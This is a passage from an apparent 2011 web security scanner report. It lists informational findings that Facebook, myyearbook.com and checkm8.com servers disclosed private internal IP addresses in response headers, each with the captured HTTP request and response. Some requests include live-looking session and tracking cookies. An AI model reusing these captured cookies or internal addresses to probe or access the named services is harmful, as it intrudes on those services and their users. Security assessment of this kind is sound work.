...IHDR...'.........b_Ci....PLTE...Oj.r..y..z...5nEa.z.....{..|........ay.......F_...................{..m........D^....@Z.B[....E^.C].......@Z.p..Le....p...........C].B\.............A[.......
...[SNIP]...

23.94. http://static.ak.fbcdn.net/rsrc.php/v1/zN/r/BAsr4eOOsw6.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zN/r/BAsr4eOOsw6.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /rsrc.php/v1/zN/r/BAsr4eOOsw6.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Wed, 29 Jun 2011 23:06:48 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 2573
Vary: Accept-Encoding
Cache-Control: public, max-age=29577279
Expires: Fri, 29 Jun 2012 21:14:05 GMT
Date: Sat, 23 Jul 2011 13:19:26 GMT
Connection: close

.PNG
.
...IHDR...3..........qY... .IDATx....PT......N.a...._..1.I.Xg2.f2.G.T...q4......c..P.Tt*.h.A[.A...F ED..H..V..c..UaY.ey-...|;~....}..$.7.......9....U.....0.1.a.c....0.1.a.c....0.1.a.c....0.1
...[SNIP]...

23.95. http://static.ak.fbcdn.net/rsrc.php/v1/zW/r/0t0iUYDtV0L.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zW/r/0t0iUYDtV0L.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.186

Request

GET /rsrc.php/v1/zW/r/0t0iUYDtV0L.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 18 Jul 2011 02:17:18 GMT
X-FB-Server: 10.138.69.186
Content-Length: 4468
Vary: Accept-Encoding
Cache-Control: public, max-age=31069814
Expires: Tue, 17 Jul 2012 03:49:39 GMT
Date: Sat, 23 Jul 2011 13:19:25 GMT
Connection: close

.PNG
.
...IHDR.......1.....e1;....;IDATx.... .0.@..?.....
6vV"..h$vba....!Y..O...;....Q..D...u.@..@...Q..D...u......5D.....%....e.I...i.....v...A..v........a.Q...~..D...u.@...Q..Q..D...u.@..@...Q..D
...[SNIP]...

23.96. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/zX/r/i_oIVTKMYsL.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/connect.php/css/share-button-css

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 08:00:32 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.193
X-Cnection: close
Cache-Control: public, max-age=20461001
Expires: Wed, 14 Mar 2012 14:59:05 GMT
Date: Thu, 21 Jul 2011 19:22:24 GMT
Connection: close

.PNG
.
...IHDR..............o&....#IDAT.[c...v.....].....A..\.Y.,..@....\.-. .....IEND.B`.

23.97. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/_IKHHfAgFQe.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zf/r/_IKHHfAgFQe.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.182

Request

GET /rsrc.php/v1/zf/r/_IKHHfAgFQe.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 18 Jul 2011 02:17:16 GMT
X-FB-Server: 10.138.16.182
Content-Length: 2635
Vary: Accept-Encoding
Cache-Control: public, max-age=31232636
Expires: Tue, 17 Jul 2012 03:56:52 GMT
Date: Thu, 21 Jul 2011 16:12:56 GMT
Connection: close

.PNG
.
...IHDR...............H.....PLTE......RRRPPPVp.WWW...]cp.h.RRRRRRRRRRRRRRRRRRwwwRRRRRRwww...www;Y....Vp.wwwVp..h.]cpVp.wwwwwwVp.www]cp]cp]cp]cpwwwVp.Vp.]cpWq.wwwwwwVp.Ys.c{....Vp.]cpVp.Vp.]cp
...[SNIP]...

23.98. http://static.ak.fbcdn.net/rsrc.php/v1/zj/r/FSEB6oLTK3I.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zj/r/FSEB6oLTK3I.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /rsrc.php/v1/zj/r/FSEB6oLTK3I.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&permalink=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 10362
Content-Type: image/png
Last-Modified: Mon, 18 Jul 2011 22:50:14 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Cache-Control: public, max-age=31139975
Expires: Tue, 17 Jul 2012 23:19:36 GMT
Date: Sat, 23 Jul 2011 13:20:01 GMT
Connection: close

.PNG
.
...IHDR.............).4.....tRNS...... .....(/IDATx^.....0..Q.. .\..aq..o.......97g..._..C.....a!,...BX ,...rJ).....|..iZ.aeCY.f{xU.j..a......j[.a!.Z.........a...',...."z.X8ce[.........../..
...[SNIP]...

23.99. http://takeover.myyearbook.com/6443/main_image.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://takeover.myyearbook.com
Path:	/6443/main_image.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.234

Request

GET /6443/main_image.jpg HTTP/1.1
Host: takeover.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:58:30 GMT
Expires: Sat, 20 Aug 2011 13:39:53 GMT
Last-Modified: Mon, 18 Jul 2011 14:58:34 GMT
Cache-Control: max-age=2592000
Content-Type: image/jpeg
ETag: 4e244a1a=10cff
Server: Cherokee/0.99.14 (UNIX)
X-MyPoolMember: 10.10.10.234
Content-Length: 68863

......Exif..II*.................Ducky.......B.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

23.100. http://web2.checkm8.com/adam/detect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web2.checkm8.com
Path:	/adam/detect

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.212.24

Request

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play= HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:06 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.24 ny-ad14
Set-cookie: cm8dccp=1311365646;Path=/;Expires=Sat, 23-Jul-2011 20:14:06 GMT;
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 697
Connection: close
Content-Type: text/html

window.CM8DispatcherApps=window.CM8DispatcherApps||[];
window.CM8DispatcherApps.push('http://web2.checkm8.com/adam/detected?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=ht
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web2.checkm8.com
Path:	/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.212.15

Request

Response

23.102. http://web2.checkm8.com/dispatcher_scripts/browserDataDetect.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web2.checkm8.com
Path:	/dispatcher_scripts/browserDataDetect.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.212.18

Request

GET /dispatcher_scripts/browserDataDetect.js?Ver=96 HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: cm8dccp=1311365646

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:08 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.18 NY-AD8
ETag: "1311350993"
Last-Modified: Fri, 22-Jul-2011 16:09:53 GMT
Age: 0
Cache-Control: max-age=50000000
Vary: Accept-Encoding
Content-Length: 5107
Connection: close
Content-Type: application/javascript

(function()
{
   // ActiveX parts compiled from http://www.builtfromsource.com/category/code/
   var r;
   function conv(v)
   {
       v = parseInt(v);
       if (! isNaN(v))
           r = Math.max(r, v);
   }

   var
...[SNIP]...

23.103. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.58.33

Request

Response

23.104. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.221.65

Request

GET /connect/connect.php?id=17890180291&connections=6&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.105. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.208.31

Request

GET /connect/connect.php?id=17890180291&connections=6&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.106. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.178.41

Request

Response

23.107. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.85.45

Request

GET /extern/login_status.php?api_key=109674171476&app_id=109674171476&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23742a92de1d96%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff27f375cb11f1dc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1774e48124534c%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff27f375cb11f1dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30e0162f9d294e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df149c47108f4df8%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff27f375cb11f1dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30e0162f9d294e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ad812b5b5255e%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff27f375cb11f1dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30e0162f9d294e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2765b3623bb682%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff27f375cb11f1dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30e0162f9d294e&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.85.45
X-Cnection: close
Date: Thu, 21 Jul 2011 18:01:43 GMT
Content-Length: 273

<script type="text/javascript">
parent.postMessage("cb=f2ad812b5b5255e&origin=http\u00253A\u00252F\u00252Fgames.myyearbook.com\u00252Ff27f375cb11f1dc&relation=parent&transport=postmessage&frame=f30e01
...[SNIP]...

23.108. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.176.48

Request

GET /extern/login_status.php?api_key=133255656700169&app_id=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df315e4f47c%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a7f0b5dc%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11d875b3c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9e02bd8%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11d875b3c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2adf2746c%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11d875b3c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5d001d24%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11d875b3c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.176.48
X-Cnection: close
Date: Sat, 23 Jul 2011 13:19:07 GMT
Content-Length: 249

<script type="text/javascript">
parent.postMessage("cb=f2adf2746c&origin=http\u00253A\u00252F\u00252Fwww.treehugger.com\u00252Ff135c372b4&relation=parent&transport=postmessage&frame=f11d875b3c", "http
...[SNIP]...

23.109. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.107.52

Request

GET /extern/login_status.php?api_key=216232338409059&app_id=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3dcaf0428%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff1660341d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c8e2fba%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff1660341d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3555ceb0c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28cae4c08%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff1660341d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3555ceb0c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df253ed489%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff1660341d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3555ceb0c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29bf91284%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff1660341d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3555ceb0c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.hitcon.org/hit2011/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.107.52
X-Cnection: close
Date: Sat, 23 Jul 2011 03:32:49 GMT
Content-Length: 238

<script type="text/javascript">
parent.postMessage("cb=f253ed489&origin=http\u00253A\u00252F\u00252Fwww.hitcon.org\u00252Ff1660341d&relation=parent&transport=postmessage&frame=f3555ceb0c", "http:\/\/w
...[SNIP]...

23.110. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.60.42

Request

GET /extern/login_status.php?api_key=216232338409059&app_id=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24d8260cc%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff37c9d985c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21c5cc3f%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff37c9d985c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1de5c7dd4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1eb41eb3%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff37c9d985c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1de5c7dd4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28b189044%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff37c9d985c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1de5c7dd4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a1f60eb8%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff37c9d985c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1de5c7dd4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.hitcon.org/hit2011/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.60.42
X-Cnection: close
Date: Sat, 23 Jul 2011 03:28:57 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f28b189044&origin=http\u00253A\u00252F\u00252Fwww.hitcon.org\u00252Ff37c9d985c&relation=parent&transport=postmessage&frame=f1de5c7dd4", "http:\/\
...[SNIP]...

23.111. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.218.54

Request

